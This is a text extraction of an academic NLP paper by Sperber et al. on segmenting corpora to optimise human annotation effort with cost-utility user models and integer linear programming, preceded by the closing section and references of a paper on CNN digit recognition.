layer to accept three-channel images; (2) switch to the more commonly used maximum pooling and Activation function, loss function; (3) introduction of gradient descent optimization algorithm RMSprop; (4) use L2 regularization. The seven-layer convolutional neural network implemented in this paper achieves direct processing of color pictures without complicated preprocessing, which improves the versatility of the model, speeds up the training and effectively avoids over-fitting. In the end, both the training speed and the prediction accuracy are better than the domestic Ma Miao and others based on the experimental results of the improved LeNet-5. After expanding the dataset, I tried to run a maximum of 170 epoch, and there was no obvious improvement in the test accuracy. Therefore, the future improvement direction should still be based on the principle. We can consider deepening the network level to obtain more abundant features. REFERENCES [1] Mori S, Suen C Y, Yamamoto K. Historical review of OCR research and development. Proceedings of the IEEE, 1992, 80(7): 1029-1058. [2] Plamondon R, Srihari S N. Online and off-line handwriting recognition: a comprehensive survey. IEEE Transactions on pattern analysis and machine intelligence, 2000, 22(1): 63-84. [3] De Campos T E, Babu B R, Varma M. Character recognition in natural images. VISAPP (2), 2009, 7. [4] Yamaguchi T, Nakano Y, Maruyama M, et al. Digit classification on signboards for telephone number recognitio. IEEE, 2003: 359. [5] ZHANG Shuai, SU Shi-tao. Doorplate Identification for Mobile Robot in Hallway Based on Morphological. Modern Electronics Technique, 2011, 34(14): 7-9+12. [6] MA Li-ling. An algorithm based on ODLLTSA and SVM classier for door plate number recognition. Journal of Central South University (Science and Technology), 2011, 42: 789. [7] ZHOU Cheng-wei. Recognition of Numbers in Natural Scene with Convolutional Neural Network.Computer Technology and Development, 2017. work_ignbu6573rhffj4ahdsagcdn6m ---- Segmentation for Efficient Supervised Language Annotation with an Explicit Cost-Utility Tradeoff Segmentation for Efficient Supervised Language Annotation with an Explicit Cost-Utility Tradeoff Matthias Sperber1, Mirjam Simantzik2, Graham Neubig3, Satoshi Nakamura3, Alex Waibel1 1Karlsruhe Institute of Technology, Institute for Anthropomatics, Germany 2Mobile Technologies GmbH, Germany 3Nara Institute of Science and Technology, AHC Laboratory, Japan matthias.sperber@kit.edu, mirjam.simantzik@jibbigo.com, neubig@is.naist.jp s-nakamura@is.naist.jp, waibel@kit.edu Abstract In this paper, we study the problem of manu- ally correcting automatic annotations of natu- ral language in as efficient a manner as pos- sible. We introduce a method for automati- cally segmenting a corpus into chunks such that many uncertain labels are grouped into the same chunk, while human supervision can be omitted altogether for other segments. A tradeoff must be found for segment sizes. Choosing short segments allows us to reduce the number of highly confident labels that are supervised by the annotator, which is useful because these labels are often already correct and supervising correct labels is a waste of effort. In contrast, long segments reduce the cognitive effort due to context switches. Our method helps find the segmentation that opti- mizes supervision efficiency by defining user models to predict the cost and utility of su- pervising each segment and solving a con- strained optimization problem balancing these contradictory objectives. A user study demon- strates noticeable gains over pre-segmented, confidence-ordered baselines on two natural language processing tasks: speech transcrip- tion and word segmentation. 1 Introduction Many natural language processing (NLP) tasks re- quire human supervision to be useful in practice, be it to collect suitable training material or to meet some desired output quality. Given the high cost of human intervention, how to minimize the supervi- sion effort is an important research problem. Previ- ous works in areas such as active learning, post edit- (a) It was a bright cold (they) in (apron), and (a) clocks were striking thirteen. (b) It was a bright cold (they) in (apron), and (a) clocks were striking thirteen. (c) It was a bright cold (they) in (apron), and (a) clocks were striking thirteen. Figure 1: Three automatic transcripts of the sentence “It was a bright cold day in April, and the clocks were strik- ing thirteen”, with recognition errors in parentheses. The underlined parts are to be corrected by a human for (a) sentences, (b) words, or (c) the proposed segmentation. ing, and interactive pattern recognition have inves- tigated this question with notable success (Settles, 2008; Specia, 2011; González-Rubio et al., 2010). The most common framework for efficient anno- tation in the NLP context consists of training an NLP system on a small amount of baseline data, and then running the system on unannotated data to estimate confidence scores of the system’s predictions (Set- tles, 2008). Sentences with the lowest confidence are then used as the data to be annotated (Figure 1 (a)). However, it has been noted that when the NLP system in question already has relatively high accu- racy, annotating entire sentences can be wasteful, as most words will already be correct (Tomanek and Hahn, 2009; Neubig et al., 2011). In these cases, it is possible to achieve much higher benefit per anno- tated word by annotating sub-sentential units (Fig- ure 1 (b)). However, as Settles et al. (2008) point out, sim- ply maximizing the benefit per annotated instance is not enough, as the real supervision effort varies 169 Transactions of the Association for Computational Linguistics, 2 (2014) 169–180. Action Editor: Eric Fosler-Lussier. Submitted 11/2013; Revised 2/2014; Published 4/2014. c©2014 Association for Computational Linguistics. 1 3 5 7 9 11 13 15 17 19 0 2 4 6 Segment length A vg . t im e / i ns ta nc e [s ec ] Transcription task Word segmentation task Figure 2: Average annotation time per instance, plotted over different segment lengths. For both tasks, the effort clearly increases for short segments. greatly across instances. This is particularly impor- tant in the context of choosing segments to annotate, as human annotators heavily rely on semantics and context information to process language, and intu- itively, a consecutive sequence of words can be su- pervised faster and more accurately than the same number of words spread out over several locations in a text. This intuition can also be seen in our empiri- cal data in Figure 2, which shows that for the speech transcription and word segmentation tasks described later in Section 5, short segments had a longer anno- tation time per word. Based on this fact, we argue it would be desirable to present the annotator with a segmentation of the data into easily supervisable chunks that are both large enough to reduce the num- ber of context switches, and small enough to prevent unnecessary annotation (Figure 1 (c)). In this paper, we introduce a new strategy for nat- ural language supervision tasks that attempts to op- timize supervision efficiency by choosing an appro- priate segmentation. It relies on a user model that, given a specific segment, predicts the cost and the utility of supervising that segment. Given this user model, the goal is to find a segmentation that mini- mizes the total predicted cost while maximizing the utility. We balance these two criteria by defining a constrained optimization problem in which one cri- terion is the optimization objective, while the other criterion is used as a constraint. Doing so allows specifying practical optimization goals such as “re- move as many errors as possible given a limited time budget,” or “annotate data to obtain some required classifier accuracy in as little time as possible.” Solving this optimization task is computationally difficult, an NP-hard problem. Nevertheless, we demonstrate that by making realistic assumptions about the segment length, an optimal solution can be found using an integer linear programming for- mulation for mid-sized corpora, as are common for supervised annotation tasks. For larger corpora, we provide simple heuristics to obtain an approximate solution in a reasonable amount of time. Experiments over two example scenarios demon- strate the usefulness of our method: Post editing for speech transcription, and active learning for Japanese word segmentation. Our model predicts noticeable efficiency gains, which are confirmed in experiments with human annotators. 2 Problem Definition The goal of our method is to find a segmentation over a corpus of word tokens wN1 that optimizes supervision efficiency according to some predictive user model. The user model is denoted as a set of functions ul,k(wba) that evaluate any possible sub- sequence wba of tokens in the corpus according to criteria l2L, and supervision modes k2K. Let us illustrate this with an example. Sperber et al. (2013) defined a framework for speech transcrip- tion in which an initial, erroneous transcript is cre- ated using automatic speech recognition (ASR), and an annotator corrects the transcript either by correct- ing the words by keyboard, by respeaking the con- tent, or by leaving the words as is. In this case, we could define K={TYPE, RESPEAK, SKIP}, each constant representing one of these three supervision modes. Our method will automatically determine the appropriate supervision mode for each segment. The user model in this example might evaluate ev- ery segment according to two criteria L, a cost crite- rion (in terms of supervision time) and a utility cri- terion (in terms of number of removed errors), when using each mode. Intuitively, respeaking should be assigned both lower cost (because speaking is faster than typing), but also lower utility than typing on a keyboard (because respeaking recognition errors can occur). The SKIP mode denotes the special, unsuper- vised mode that always returns 0 cost and 0 utility. Other possible supervision modes include mul- tiple input modalities (Suhm et al., 2001), several human annotators with different expertise and cost 170 (Donmez and Carbonell, 2008), and correction vs. translation from scratch in machine translation (Spe- cia, 2011). Similarly, cost could instead be ex- pressed in monetary terms, or the utility function could predict the improvement of a classifier when the resulting annotation is not intended for direct hu- man consumption, but as training data for a classifier in an active learning framework. 3 Optimization Framework Given this setting, we are interested in simulta- neously finding optimal locations and supervision modes for all segments, according to the given cri- teria. Each resulting segment will be assigned ex- actly one of these supervision modes. We de- note a segmentation of the N tokens of corpus wN1 into MN segments by specifying segment bound- ary markers sM +11 =(s1=1, s2, . . . , sM +1=N +1). Setting a boundary marker si=a means that we put a segment boundary before the a-th word to- ken (or the end-of-corpus marker for a=N +1). Thus our corpus is segmented into token sequences [(wsj , . . . , wsj+1�1)] M j=1. The supervision modes assigned to each segment are denoted by mj . We favor those segmentations that minimize the cumu- lative value PM j=1[ul,mj (w sj+1 sj )] for each criterion l. For any criterion where larger values are intuitively better, we flip the sign before defining ul,mj (w sj+1 sj ) to maintain consistency (e.g. negative number of er- rors removed). 3.1 Multiple Criteria Optimization In the case of a single criterion (|L|=1), we obtain a simple, single-objective unconstrained linear opti- mization problem, efficiently solvable via dynamic programming (Terzi and Tsaparas, 2006). However, in practice one usually encounters several compet- ing criteria, such as cost and utility, and here we will focus on this more realistic setting. We balance competing criteria by using one as an optimization objective, and the others as constraints.1 Let crite- 1This approach is known as the bounded objective function method in multi-objective optimization literature (Marler and Arora, 2004). The very popular weighted sum method merges criteria into a single efficiency measure, but is problematic in our case because the number of supervised tokens is unspec- ified. Unless the weights are carefully chosen, the algorithm might find, e.g., the completely unsupervised or completely su- (at)% (what’s)% a% bright% …% [RESPEAK:1.5/2]/ [SKIP:0/0]/ 1/ cold%2/ 3/ 4/ 5/ 6/ [TYPE:2/5]/ [TYPE:1/4]/ [TYPE:1/4]/ [RESPEAK:0/3]/[SKIP:0/0]/ Figure 3: Excerpt of a segmentation graph for an ex- ample transcription task similar to Figure 1 (some edges are omitted for readability). Edges are labeled with their mode, predicted number of errors that can be removed, and necessary supervision time. A segmentation scheme might prefer solid edges over dashed ones in this exam- ple. rion l0 be the optimization objective criterion, and let Cl denote the constraining constants for the cri- teria l 2 L�l0 = L \ {l0}. We state the optimization problem: min M ;sM+11 ;m M 1 MX j=1 ⇥ ul0,mj � w sj+1 sj �⇤ s.t. MX j=1 ⇥ ul,mj � w sj+1 sj �⇤  Cl (8l 2 L�l0 ) This constrained optimization problem is difficult to solve. In fact, the NP-hard multiple-choice knap- sack problem (Pisinger, 1994) corresponds to a spe- cial case of our problem in which the number of seg- ments is equal to the number of tokens, implying that our more general problem is NP-hard as well. In order to overcome this problem, we refor- mulate search for the optimal segmentation as a resource-constrained shortest path problem in a di- rected, acyclic multigraph. While still not efficiently solvable in theory, this problem is well studied in domains such as vehicle routing and crew schedul- ing (Irnich and Desaulniers, 2005), and it is known that in many practical situations the problem can be solved reasonably efficiently using integer linear programming relaxations (Toth and Vigo, 2001). In our formalism, the set of nodes V represents the spaces between neighboring tokens, at which the algorithm may insert segment boundaries. A node with index i represents a segment break before the i-th token, and thus the sequence of the indices in a path directly corresponds to sM +11 . Edges E de- note the grouping of tokens between the respective pervised segmentation to be most “efficient.” 171 nodes into one segment. Edges are always directed from left to right, and labeled with a supervision mode. In addition, each edge between nodes i and j is assigned ul,k(w j�1 i ), the corresponding predicted value for each criterion l 2 L and supervision mode k 2 K, indicating that the supervision mode of the j-th segment in a path directly corresponds to mj . Figure 3 shows an example of what the result- ing graph may look like. Our original optimization problem is now equivalent to finding the shortest path between the first and last nodes according to criterion l0, while obeying the given resource con- straints. According to a widely used formulation for the resource constrained shortest path problem, we can define Eij as the set of competing edges between i and j, and express this optimization problem with the following integer linear program (ILP): min x X i,j2V X k2Eij xijkul0,k(s j�1 i ) (1) s.t. X i,j2V X k2Eij xijkul,k(s j�1 i )  Cl (8l 2 L�l0 ) (2) X i2V k2Eij xijk = X i2V k2Eij xjik (8j 2 V \{1, n}) (3) X j2V k2E1j x1jk = 1 (4) X i2V k2Ein xink = 1 (5) xijk 2 {0, 1} (8xijk 2 x) (6) The variables x={xijk|i, j 2 V , k 2 Eij } denote the activation of the k’th edge between nodes i and j. The shortest path according to the minimization objective (1), that still meets the resource constraints for the specified criteria (2), is to be computed. The degree constraints (3,4,5) specify that all but the first and last nodes must have as many incoming as out- going edges, while the first node must have exactly one outgoing, and the last node exactly one incom- ing edge. Finally, the integrality condition (6) forces all edges to be either fully activated or fully deacti- vated. The outlined problem formulation can solved directly by using off-the-shelf ILP solvers, here we employ GUROBI (Gurobi Optimization, 2012). 3.2 Heuristics for Approximation In general, edges are inserted for every supervision mode between every combination of two nodes. The search space can be constrained by removing some of these edges to increase efficiency. In this study, we only consider edges spanning at most 20 tokens. For cases in which larger corpora are to be anno- tated, or when the acceptable delay for delivering re- sults is small, a suitable segmentation can be found approximately. The easiest way would be to parti- tion the corpus, e.g. according to its individual doc- uments, divide the budget constraints evenly across all partitions, and then segment each partition inde- pendently. More sophisticated methods might ap- proximate the Pareto front for each partition, and distribute the budgets in an intelligent way. 4 User Modeling While the proposed framework is able to optimize the segmentation with respect to each criterion, it also rests upon the assumption that we can provide user models ul,k(w j�1 i ) that accurately evaluate ev- ery segment according to the specified criteria and supervision modes. In this section, we discuss our strategies for estimating three conceivable criteria: annotation cost, correction of errors, and improve- ment of a classifier. 4.1 Annotation Cost Modeling Modeling cost requires solving a regression prob- lem from features of a candidate segment to annota- tion cost, for example in terms of supervision time. Appropriate input features depend on the task, but should include notions of complexity (e.g. a confi- dence measure) and length of the segment, as both are expected to strongly influence supervision time. We propose using Gaussian process (GP) regres- sion for cost prediction, a start-of-the-art nonpara- metric Bayesian regression technique (Rasmussen and Williams, 2006)2. As reported on a similar task by Cohn and Specia (2013), and confirmed by our preliminary experiments, GP regression signifi- cantly outperforms popular techniques such as sup- 2Code available at http://www.gaussianprocess.org/gpml/ 172 port vector regression and least-squares linear re- gression. We also follow their settings for GP, em- ploying GP regression with a squared exponential kernel with automatic relevance determination. De- pending on the number of users and amount of train- ing data available for each user, models may be trained separately for each user (as we do here), or in a combined fashion via multi-task learning as pro- posed by Cohn and Specia (2013). It is also crucial for the predictions to be reliable throughout the whole relevant space of segments. If the cost of certain types of segments is system- atically underpredicted, the segmentation algorithm might be misled to prefer these, possibly a large number of times.3 An effective trick to prevent such underpredictions is to predict the log time instead of the actual time. In this way, errors in the critical low end are penalized more strongly, and the time can never become negative. 4.2 Error Correction Modeling As one utility measure, we can use the number of errors corrected, a useful measure for post editing tasks over automatically produced annotations. In order to measure how many errors can be removed by supervising a particular segment, we must es- timate both how many errors are in the automatic annotation, and how reliably a human can remove these for a given supervision mode. Most machine learning techniques can estimate confidence scores in the form of posterior probabil- ities. To estimate the number of errors, we can sum over one minus the posterior for all tokens, which estimates the Hamming distance from the reference annotation. This measure is appropriate for tasks in which the number of tokens is fixed in advance (e.g. a part-of-speech estimation task), and a reasonable approximation for tasks in which the number of to- kens is not known in advance (e.g. speech transcrip- tion, cf. Section 5.1.1). Predicting the particular tokens at which a human will make a mistake is known to be a difficult task (Olson and Olson, 1990), but a simplifying constant 3For instance, consider a model that predicts well for seg- ments of medium size or longer, but underpredicts the supervi- sion time of single-token segments. This may lead the segmen- tation algorithm to put every token into its own segment, which is clearly undesirable. human error rate can still be useful. For example, in the task from Section 2, we may suspect a certain number of errors in a transcript segment, and predict, say, 95% of those errors to be removed via typing, but only 85% via respeaking. 4.3 Classifier Improvement Modeling Another reasonable utility measure is accuracy of a classifier trained on the data we choose to annotate in an active learning framework. Confidence scores have been found useful for ranking particular tokens with regards to how much they will improve a clas- sifier (Settles, 2008). Here, we may similarly score segment utility as the sum of its token confidences, although care must be taken to normalize and cali- brate the token confidences to be linearly compara- ble before doing so. While the resulting utility score has no interpretation in absolute terms, it can still be used as an optimization objective (cf. Section 5.2.1). 5 Experiments In this section, we present experimental results ex- amining the effectiveness of the proposed method over two tasks: speech transcription and Japanese word segmentation.4 5.1 Speech Transcription Experiments Accurate speech transcripts are a much-demanded NLP product, useful by themselves, as training ma- terial for ASR, or as input for follow-up tasks like speech translation. With recognition accuracies plateauing, manually correcting (post editing) auto- matic speech transcripts has become popular. Com- mon approaches are to identify words (Sanchez- Cortina et al., 2012) or (sub-)sentences (Sperber et al., 2013) of low confidence, and have a human edi- tor correct these. 5.1.1 Experimental Setup We conduct a user study in which participants post-edited speech transcripts, given a fixed goal word error rate. The transcription setup was such that the transcriber could see the ASR transcript of parts before and after the segment that he was edit- ing, providing context if needed. When imprecise time alignment resulted in segment breaks that were 4Software and experimental data can be downloaded from http://www.msperber.com/research/tacl-segmentation/ 173 slightly “off,” as happened occasionally, that context helped guess what was said. The segment itself was transcribed from scratch, as opposed to editing the ASR transcript; besides being arguably more effi- cient when the ASR transcript contains many mis- takes (Nanjo et al., 2006; Akita et al., 2009), prelim- inary experiments also showed that supervision time is far easier to predict this way. Figure 4 illustrates what the setup looked like. We used a self-developed transcription tool to conduct experiments. It presents our computed seg- ments one by one, allows convenient input and play- back via keyboard shortcuts, and logs user interac- tions with their time stamps. A selection of TED talks5 (English talks on technology, entertainment, and design) served as experimental data. While some of these talks contain jargon such as medi- cal terms, they are presented by skilled speakers, making them comparably easy to understand. Initial transcripts were created using the Janus recognition toolkit (Soltau et al., 2001) with a standard, TED- optimized setup. We used confusion networks for decoding and obtaining confidence scores. For reasons of simplicity, and better compara- bility to our baseline, we restricted our experiment to two supervision modes: TYPE and SKIP. We conducted experiments with 3 participants, 1 with several years of experience in transcription, 2 with none. Each participant received an explanation on the transcription guidelines, and a short hands-on training to learn to use our tool. Next, they tran- scribed a balanced selection of 200 segments of varying length and quality in random order. This data was used to train the user models. Finally, each participant transcribed another 2 TED talks, with word error rate (WER) 19.96% (predicted: 22.33%). We set a target (predicted) WER of 15% as our optimization constraint,6 and minimize the predicted supervision time as our ob- jective function. Both TED talks were transcribed once using the baseline strategy, and once using the proposed strategy. The order of both strategies was reversed between talks, to minimize learning bias due to transcribing each talk twice. The baseline strategy was adopted according to 5www.ted.com 6Depending on the level of accuracy required by our final application, this target may be set lower or higher. Sperber et al. (2013): We segmented the talk into natural, subsentential units, using Matusov et al. (2006)’s segmenter, which we tuned to reproduce the TED subtitle segmentation, producing a mean segment length of 8.6 words. Segments were added in order of increasing average word confidence, until the user model predicted a WER<15%. The second segmentation strategy was the proposed method, similarly with a resource constraint of WER<15%. Supervision time was predicted via GP regres- sion (cf. Section 4.1), using segment length, au- dio duration, and mean confidence as input features. The output variable was assumed subject to addi- tive Gaussian noise with zero mean, a variance of 5 seconds was chosen empirically to minimize the mean squared error. Utility prediction (cf. Section 4.2) was based on posterior scores obtained from the confusion networks. We found it important to calibrate them, as the posteriors were overconfident especially in the upper range. To do so, we automat- ically transcribed a development set of TED data, grouped the recognized words into buckets accord- ing to their posteriors, and determined the average number of errors per word in each bucket from an alignment with the reference transcript. The map- ping from average posterior to average number of errors was estimated via GP regression. The result was summed over all tokens, and multiplied by a constant human confidence, separately determined for each participant.7 5.1.2 Simulation Results To convey a better understanding of the poten- tial gains afforded by our method, we first present a simulated experiment. We assume a transcriber who makes no mistakes, and needs exactly the amount of time predicted by a user model trained on the data of a randomly selected participant. We compare three scenarios: A baseline simulation, in which the base- line segments are transcribed in ascending order of confidence; a simulation using the proposed method, in which we change the WER constraint in small in- crements; finally, an oracle simulation, which uses 7More elaborate methods for WER estimation exist, such as by Ogawa et al. (2013), but if our method achieves improve- ments using simple Hamming distance, incorporating more so- phisticated measures will likely achieve similar, or even better accuracy. 174 (3) SKIP: “nineteen forty six until today you see the green” (4) TYPE: <annotator types: “is the traditional”> (5) SKIP: “Interstate conflict” (6) TYPE: <annotator types: “the ones we used to”> (7) SKIP: . . . Figure 4: Result of our segmentation method (excerpt). TYPE segments are displayed empty and should be tran- scribed from scratch. For SKIP segments, the ASR tran- script is displayed to provide context. When annotating a segment, the corresponding audio is played back. 0 10 20 30 40 50 60 0 5 10 15 20 25 Post editing time [min] R es ul tin g W E R [% ] Baseline Proposed Oracle Figure 5: Simulation of post editing on example TED talk. The proposed method reduces the WER consider- ably faster than the baseline at first, later both converge. The much superior oracle simulation indicates room for further improvement. the proposed method, but uses a utility model that knows the actual number of errors in each segment. For each supervised segment, we simply replace the ASR output with the reference, and measure the re- sulting WER. Figure 5 shows the simulation on an example TED talk, based on an initial transcript with 21.9% WER. The proposed method is able to reduce the WER faster than the baseline, up to a certain point where they converge. The oracle simulation is even faster, indicating room for improvement through better confidence scores. 5.1.3 User Study Results Table 1 shows the results of the user study. First, we note that the WER estimation by our utility model was off by about 2.5%: While the predicted improvement in WER was from 22.33% to 15.0%, the actual improvement was from 19.96% to about 12.5%. The actual resulting WER was consistent Participant Baseline Proposed WER Time WER Time P1 12.26 44:05 12.18 33:01 P2 12.75 36:19 12.77 29:54 P3 12.70 52:42 12.50 37:57 AVG 12.57 44:22 12.48 33:37 Table 1: Transcription task results. For each user, the resulting WER [%] after supervision is shown, along with the time [min] they needed. The unsupervised WER was 19.96%. across all users, and we observe strong, consistent reductions in supervision time for all participants. Prediction of the necessary supervision time was ac- curate: Averaged over participants, 45:41 minutes were predicted for the baseline, 44:22 minutes mea- sured. For the proposed method, 32:11 minutes were predicted, 33:37 minutes measured. On average, participants removed 6.68 errors per minute using the baseline, and 8.93 errors per minute using the proposed method, a speed-up of 25.2%. Note that predicted and measured values are not strictly comparable: In the experiments, to provide a fair comparison participants transcribed the same talks twice (once using baseline, once the proposed method, in alternating order), resulting in a notice- able learning effect. The user model, on the other hand, is trained to predict the case in which a tran- scriber conducts only one transcription pass. As an interesting finding, without being informed about the order of baseline and proposed method, participants reported that transcribing according to the proposed segmentation seemed harder, as they found the baseline segmentation more linguistically reasonable. However, this perceived increase in dif- ficulty did not show in efficiency numbers. 5.2 Japanese Word Segmentation Experiments Word segmentation is the first step in NLP for lan- guages that are commonly written without word boundaries, such as Japanese and Chinese. We ap- ply our method to a task in which we domain-adapt a word segmentation classifier via active learning. In this experiment, participants annotated whether or not a word boundary occurred at certain positions in a Japanese sentence. The tokens to be grouped into segments are positions between adjacent characters. 175 5.2.1 Experimental Setup Neubig et al. (2011) have proposed a pointwise method for Japanese word segmentation that can be trained using partially annotated sentences, which makes it attractive in combination with active learn- ing, as well as our segmentation method. The authors released their method as a software pack- age “KyTea” that we employed in this user study. We used KyTea’s active learning domain adaptation toolkit8 as a baseline. For data, we used the Balanced Corpus of Con- temporary Written Japanese (BCCWJ), created by Maekawa (2008), with the internet Q&A subcor- pus as in-domain data, and the whitepaper subcor- pus as background data, a domain adaptation sce- nario. Sentences were drawn from the in-domain corpus, and the manually annotated data was then used to train KyTea, along with the pre-annotated background data. The goal (objective function) was to improve KyTea’s classification accuracy on an in- domain test set, given a constrained time budget of 30 minutes. There were again 2 supervision modes: ANNOTATE and SKIP. Note that this is essentially a batch active learning setup with only one iteration. We conducted experiments with one expert with several years of experience with Japanese word seg- mentation annotation, and three non-expert native speakers with no prior experience. Japanese word segmentation is not a trivial task, so we provided non-experts with training, including explanation of the segmentation standard, a supervised test with immediate feedback and explanations, and hands-on training to get used to the annotation software. Supervision time was predicted via GP regression (cf. Section 4.1), using the segment length and mean confidence as input features. As before, the output variable was assumed subject to additive Gaussian noise with zero mean and 5 seconds variance. To ob- tain training data for these models, each participant annotated about 500 example instances, drawn from the adaptation corpus, grouped into segments and balanced regarding segment length and difficulty. For utility modeling (cf. Section 4.3), we first nor- malized KyTea’s confidence scores, which are given in terms of SVM margin, using a sigmoid function (Platt, 1999). The normalization parameter was se- 8http://www.phontron.com/kytea/active.html lected so that the mean confidence on a development set corresponded to the actual classifier accuracy. We derive our measure of classifier improvement for correcting a segment by summing over one minus the calibrated confidence for each of its tokens. To analyze how well this measure describes the actual training utility, we trained KyTea using the back- ground data plus disjoint groups of 100 in-domain instances with similar probabilities and measured the achieved reduction of prediction errors. The cor- relation between each group’s mean utility and the achieved error reduction was 0.87. Note that we ig- nore the decaying returns usually observed as more data is added to the training set. Also, we did not attempt to model user errors. Employing a con- stant base error rate, as in the transcription scenario, would change segment utilities only by a constant factor, without changing the resulting segmentation. After creating the user models, we conducted the main experiment, in which each participant anno- tated data that was selected from a pool of 1000 in-domain sentences using two strategies. The first, baseline strategy was as proposed by Neubig et al. (2011). Queries are those instances with the low- est confidence scores. Each query is then extended to the left and right, until a word boundary is pre- dicted. This strategy follows similar reasoning as was the premise to this paper: To decide whether or not a position in a text corresponds to a word bound- ary, the annotator has to acquire surrounding context information. This context acquisition is relatively time consuming, so he might as well label the sur- rounding instances with little additional effort. The second strategy was our proposed, more principled approach. Queries of both methods were shuffled to minimize bias due to learning effects. Finally, we trained KyTea using the results of both methods, and compared the achieved classifier improvement and supervision times. 5.2.2 User Study Results Table 2 summarizes the results of our experi- ment. It shows that the annotations by each partic- ipant resulted in a better classifier for the proposed method than the baseline, but also took up consider- ably more time, a less clear improvement than for the transcription task. In fact, the total error for time predictions was as high as 12.5% on average, 176 Participant Baseline Proposed Time Acc. Time Acc. Expert 25:50 96.17 32:45 96.55 NonExp1 22:05 95.79 26:44 95.98 NonExp2 23:37 96.15 31:28 96.21 NonExp3 25:23 96.38 33:36 96.45 Table 2: Word segmentation task results, for our ex- pert and 3 non-expert participants. For each participant, the resulting classifier accuracy [%] after supervision is shown, along with the time [min] they needed. The unsu- pervised accuracy was 95.14%. where the baseline method tended take less time than predicted, the proposed method more time. This is in contrast to a much lower total error (within 1%) when cross-validating our user model training data. This is likely due to the fact that the data for train- ing the user model was selected in a balanced man- ner, as opposed to selecting difficult examples, as our method is prone to do. Thus, we may expect much better predictions when selecting user model training data that is more similar to the test case. Plotting classifier accuracy over annotation time draws a clearer picture. Let us first analyze the re- sults for the expert annotator. Figure 6 (E.1) shows that the proposed method resulted in consistently better results, indicating that time predictions were still effective. Note that this comparison may put the proposed method at a slight disadvantage by com- paring intermediate results despite optimizing glob- ally. For the non-experts, the improvement over the baseline is less consistent, as can be seen in Fig- ure 6 (N.1) for one representative. According to our analysis, this can be explained by two factors: (1) The non-experts’ annotation error (6.5% on av- erage) was much higher than the expert’s (2.7%), resulting in a somewhat irregular classifier learn- ing curve. (2) The variance in annotation time per segment was consistently higher for the non- experts than the expert, indicated by an average per-segment prediction error of 71% vs. 58% rela- tive to the mean actual value, respectively. Infor- mally speaking, non-experts made more mistakes, and were more strongly influenced by the difficulty of a particular segment (which was higher on av- erage with the proposed method, as indicated by a 0 10 20 30 0.955 0.965 0 10 20 30 0.955 0.965 0 10 20 30 0.955 0.965 0 10 20 30 0.955 0.965 0 10 20 30 0.955 0.965 0 10 20 30 0.955 0.965 0 10 20 30 0.955 0.965 0 10 20 30 0.955 0.965 Prop. Basel N.1E.1 N.2E.2 N.3E.3 N.4E.4 Annotation time [min.] C la ss if ie r A cc ur ac y . Figure 6: Classifier improvement over time, depicted for the expert (E) and a non-expert (N). The graphs show numbers based on (1) actual annotations and user mod- els as in Sections 4.1 and 4.3, (2) error-free annotations, (3) measured times replaced by predicted times, and (4) both reference annotations and replaced time predictions. lower average confidence).9 In Figures 6 (2-4) we present a simulation experi- ment in which we first pretend as if annotators made no mistakes, then as if they needed exactly as much time as predicted for each segment, and then both. This cheating experiment works in favor of the pro- posed method, especially for the non-expert. We may conclude that our segmentation approach is ef- fective for the word segmentation task, but requires more accurate time predictions. Better user models will certainly help, although for the presented sce- nario our method may be most useful for an expert annotator. 9Note that the non-expert in the figure annotated much faster than the expert, which explains the comparable classification result despite making more annotation errors. This is in contrast to the other non-experts, who were slower. 177 5.3 Computational Efficiency Since our segmentation algorithm does not guar- antee polynomial runtime, computational efficiency was a concern, but did not turn out problematic. On a consumer laptop, the solver produced seg- mentations within a few seconds for a single docu- ment containing several thousand tokens, and within hours for corpora consisting of several dozen doc- uments. Runtime increased roughly quadratically with respect to the number of segmented tokens. We feel that this is acceptable, considering that the time needed for human supervision will likely dominate the computation time, and reasonable approxima- tions can be made as noted in Section 3.2. 6 Relation to Prior Work Efficient supervision strategies have been studied across a variety of NLP-related research areas, and received increasing attention in recent years. Ex- amples include post editing for speech recogni- tion (Sanchez-Cortina et al., 2012), interactive ma- chine translation (González-Rubio et al., 2010), ac- tive learning for machine translation (Haffari et al., 2009; González-Rubio et al., 2011) and many other NLP tasks (Olsson, 2009), to name but a few studies. It has also been recognized by the active learn- ing community that correcting the most useful parts first is often not optimal in terms of efficiency, since these parts tend to be the most difficult to manually annotate (Settles et al., 2008). The authors advocate the use of a user model to predict the supervision ef- fort, and select the instances with best “bang-for-the- buck.” This prediction of supervision effort was suc- cessful, and was further refined in other NLP-related studies (Tomanek et al., 2010; Specia, 2011; Cohn and Specia, 2013). Our approach to user modeling using GP regression is inspired by the latter. Most studies on user models consider only super- vision effort, while neglecting the accuracy of hu- man annotations. The view on humans as a perfect oracle has been criticized (Donmez and Carbonell, 2008), since human errors are common and can negatively affect supervision utility. Research on human-computer-interaction has identified the mod- eling of human errors as very difficult (Olson and Olson, 1990), depending on factors such as user ex- perience, cognitive load, user interface design, and fatigue. Nevertheless, even the simple error model used in our post editing task was effective. The active learning community has addressed the problem of balancing utility and cost in some more detail. The previously reported “bang-for-the-buck” approach is a very simple, greedy approach to com- bine both into one measure. A more theoretically founded scalar optimization objective is the net ben- efit (utility minus costs) as proposed by Vijaya- narasimhan and Grauman (2009), but unfortunately is restricted to applications where both can be ex- pressed in terms of the same monetary unit. Vijaya- narasimhan et al. (2010) and Donmez and Carbonell (2008) use a more practical approach that specifies a constrained optimization problem by allowing only a limited time budget for supervision. Our approach is a generalization thereof and allows either specify- ing an upper bound on the predicted cost, or a lower bound on the predicted utility. The main novelty of our presented approach is the explicit modeling and selection of segments of various sizes, such that annotation efficiency is opti- mized according to the specified constraints. While some works (Sassano and Kurohashi, 2010; Neubig et al., 2011) have proposed using subsentential seg- ments, we are not aware of any previous work that explicitly optimizes that segmentation. 7 Conclusion We presented a method that can effectively choose a segmentation of a language corpus that optimizes supervision efficiency, considering not only the ac- tual usefulness of each segment, but also the anno- tation cost. We reported noticeable improvements over strong baselines in two user studies. Future user experiments with more participants would be desir- able to verify our observations, and allow further analysis of different factors such as annotator ex- pertise. Also, future research may improve the user modeling, which will be beneficial for our method. Acknowledgments The research leading to these results has received funding from the European Union Seventh Frame- work Programme (FP7/2007-2013) under grant agreement n 287658 Bridges Across the Language Divide (EU-BRIDGE). 178 References Yuya Akita, Masato Mimura, and Tatsuya Kawahara. 2009. Automatic Transcription System for Meetings of the Japanese National Congress. In Interspeech, pages 84–87, Brighton, UK. Trevor Cohn and Lucia Specia. 2013. Modelling Anno- tator Bias with Multi-task Gaussian Processes: An Ap- plication to Machine Translation Quality Estimation. In Association for Computational Linguistics Confer- ence (ACL), Sofia, Bulgaria. Pinar Donmez and Jaime 